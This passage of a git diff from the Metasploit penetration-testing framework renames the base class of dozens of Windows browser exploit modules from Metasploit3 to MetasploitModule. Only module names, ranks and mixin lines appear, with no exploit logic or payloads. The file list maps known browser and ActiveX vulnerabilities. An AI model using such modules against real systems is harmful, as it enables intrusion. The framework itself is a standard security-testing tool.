b/modules/exploits/windows/browser/ms12_004_midi.rb index 22dcfc7b6a..16cec1843d 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb index de2192eb00..af516188b1 100644 --- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb +++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index 6d6b762169..ae82b71a96 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index a0302f48dc..66098c6c37 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb index cb409f5da7..d766b0638d 100644 --- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb +++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 72a855ab3c..09200f72af 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_055_canchor.rb b/modules/exploits/windows/browser/ms13_055_canchor.rb index bbed4c4ee0..55980c503d 100644 --- a/modules/exploits/windows/browser/ms13_055_canchor.rb +++ b/modules/exploits/windows/browser/ms13_055_canchor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb index 80881a1894..fc2563ea71 100644 --- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb +++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb index aaf14954b6..6178bc76a8 100644 --- a/modules/exploits/windows/browser/ms13_069_caret.rb +++ b/modules/exploits/windows/browser/ms13_069_caret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index dd3327be64..6ee1ddd0da 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb index 99aa91da65..136025b1a0 100644 --- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb +++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 8129288d3f..5b709aacba 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb index b28f0dc273..5b2f00c98e 100644 --- a/modules/exploits/windows/browser/ms14_012_textrange.rb +++ b/modules/exploits/windows/browser/ms14_012_textrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb index 99cd39a738..a539f7c1f8 100644 --- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb +++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 70582071df..8a2c327422 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 6acfe799f4..09b8351635 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index 040ee2fa16..dac7e039f8 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 5202ae760e..52f37d6fd8 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index d137afaaea..35671acecc 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 292b1c9539..fb3fd45964 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index d6e76ffe2d..011b5f84d5 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index 2c5c4424cf..a61d88ca68 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index 28b4f9ef75..042abf46a7 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index d247e134c7..fb669b078b 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 6ec5f52b65..8cfc00ade1 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index cc6954458c..20a29ec374 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index fd55d572ea..c784347f9d 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 70db241a7c..6badf5ec16 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index 4461b2a70e..34573d0248 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb index 846f4befde..611029ad99 100644 --- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb +++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb index 9c195aa332..e943b11db0 100644 --- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb +++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb index 694e4d6431..f4cccba075 100644 --- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb +++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index 51961e8099..a369d42b06 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index f80e83d451..9335d80815 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 5295485415..5ecae278aa 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index 34d945a5d1..7184ac812a 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index c5c57b34c1..d4018ccb1e 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index a74f4bcff9..3d508ab03b 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb index d260b5ba37..af452faef1 100644 --- a/modules/exploits/windows/browser/quickr_qp2_bof.rb +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index c2afc67f27..f24cab863b 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index 75f94ecd5b..049dfae49f 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 33fedfc9c6..5e8066f7bb 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 0aab25f860..8af7086610 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index 9a14d5500a..5b81c4d16d 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index 7c0cc98bb6..2523e574e7 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index af12347a60..262b0480b4 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index d6fe45cc71..2397e4d9f4 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb index 74706eabcb..057ff83b3c 100644 --- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb +++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 3fee969510..b53b4c019d 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb index 33f43e125b..73ca64f4bd 100644 --- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb +++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index b234fe3cdb..7649666ea1 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index 826b8ebc90..6244740d46 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index de69777a84..f35dcf5e4e 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index bdad1cf0ff..b76478f196 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 034b2bb5a2..75d5bcdeb2 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index aa83462d25..eb84ff49fe 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index 040559c4ba..6ab6a8ac97 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb index e3471a628f..f950ccbaac 100644 --- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb +++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 0d0a45ad76..90f780c73f 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index d699f52c02..4540017403 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index 